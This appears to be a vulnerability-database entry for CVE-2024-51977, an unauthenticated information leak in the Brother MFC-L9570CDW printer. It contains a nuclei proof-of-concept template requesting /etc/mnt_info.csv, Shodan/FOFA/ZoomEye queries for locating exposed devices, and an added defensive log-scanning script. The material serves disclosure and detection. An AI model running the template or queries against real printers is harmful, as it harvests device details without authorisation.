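Brother MFC-L9570CDW Information Disclosure Vulnerability

Vulnerability information

Vulnerability name: Brother MFC-L9570CDW Information Disclosure Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-51977

Vulnerability type: Information disclosure

Severity: Medium

Description: The Brother MFC-L9570CDW is a multifunction printer widely used in enterprise and home environments, providing printing, copying, scanning and related functions. Because of the convenience of its network features, these devices are often deployed on office networks where print resources need to be shared. The information disclosure vulnerability affects the device's HTTP service (TCP port 80), HTTPS service (TCP port 443) and IPP service (TCP port 631). The root cause is that the device does not apply proper authentication controls to requests for the path /etc/mnt_info.csv, so an unauthenticated attacker can obtain sensitive device information with a simple GET request. The leaked information includes the device model, firmware version, IP address and serial number. An attacker may use this information for further network attacks, such as exploiting firmware vulnerabilities specific to the model or phishing. Because exploitation requires no authentication and can be performed remotely, the vulnerability poses a medium-level threat to affected devices. Users are advised to update the device firmware promptly or to configure network access controls to reduce the risk.

Vendor: Brother

Product name: Brother MFC-L9570CDW

Search syntax: html:"MFC-L9570CDW"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/526670e12d4aad82b9aadb12f084d6775e60410e/http%2Fcves%2F2024%2FCVE-2024-51977.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details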

id: CVE-2024-51977

info:
  name: Brother MFC-L9570CDW - Information Disclosure
  author: DhiyaneshDK,iamnoooob,darses
  severity: medium
  description: |
    An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.
  reference:
    - https://github.com/sfewer-r7/BrotherVulnerabilities/blob/main/CVE-2024-51977.rb
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MFC-L9570CDW"
    fofa-query:
      - app="brother-Printer"
    zoomeye-query:
      - device="brother-Printer" || app="brother-Printer"
  tags: cve,cve2024,brother,mfc,printer,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/etc/mnt_info.csv"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Model Name"'
          - '"IP Address"'
        condition: and

      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "text/comma-separated-values")'
        condition: and
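
A defender-side check for the request described above, added here as an example and not part of the nuclei template or the original page: it scans HTTP access logs for GET requests to /etc/mnt_info.csv and reports which sources were actually served the file. The combined log format (for instance from a reverse proxy or network sensor in front of the printers) is an assumption, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

LEAK_PATH = "/etc/mnt_info.csv"  # path named in the advisory

# Assumption: logs are in combined log format (not stated on the page).
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample input (documentation address ranges, invented timestamps).
SAMPLE_LOG = """\
10.0.5.23 - - [12/Jul/2025:09:14:02 +0000] "GET /general/status.html HTTP/1.1" 200 5120
203.0.113.7 - - [12/Jul/2025:09:15:40 +0000] "GET /etc/mnt_info.csv HTTP/1.1" 200 412
203.0.113.7 - - [12/Jul/2025:09:15:41 +0000] "GET /etc/mnt_info.csv?x=1 HTTP/1.1" 200 412
198.51.100.9 - - [12/Jul/2025:09:20:11 +0000] "GET /etc/mnt_info.csv HTTP/1.1" 403 0
"""

def normalize(target):
    """Drop the query string, percent-decode, collapse repeated slashes, lower-case."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/+", "/", path).lower()

def find_leak_requests(log_text):
    """Return {source_ip: [(timestamp, status), ...]} for GETs to LEAK_PATH."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "GET":
            continue  # unparsable line or a different method
        if normalize(m["target"]) == LEAK_PATH:
            hits[m["src"]].append((m["ts"], int(m["status"])))
    return dict(hits)

def leaked_to(hits):
    """Sources that got a 200, i.e. the CSV was served without authentication."""
    return sorted(ip for ip, evts in hits.items() if any(s == 200 for _, s in evts))

if __name__ == "__main__":
    found = find_leak_requests(SAMPLE_LOG)
    for ip, events in found.items():
        print(ip, events)
    print("served to:", leaked_to(found))
```

A 200 for this path from a source outside the management network indicates the device is still exposing the CSV; a 403 or 404 after a firmware update or an access-control change indicates the mitigation is in effect.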